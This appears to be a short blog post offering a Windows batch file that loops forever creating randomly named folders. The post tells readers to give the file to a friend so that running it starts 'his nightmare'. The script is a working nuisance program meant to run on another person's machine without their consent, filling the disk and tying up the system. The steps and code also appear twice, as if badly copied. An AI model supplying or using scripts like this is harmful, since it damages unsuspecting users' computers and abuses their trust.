A awesome trick through which you can make 3000 folder at a time.
This batch file will create 3000+ folder in less than a minute.
Step-1 Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top
Step-2 Save it as 3000.bat
This batch file will create 3000+ folder in less than a minute.
Step-1 Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top
Step-2 Save it as 3000.bat
Step-3 Give this file to your friend and when he will click on that his nightmare will be started.
Above Code Explained.
@echo off makes your command prompt window blank.
md %random% is the command in MS-DOS to create random folders.
(md is used for creating a folder and %random% means folders with random names.)
goto top- retures the command
to :top which causes an infinite loop.
0 comments:
Post a Comment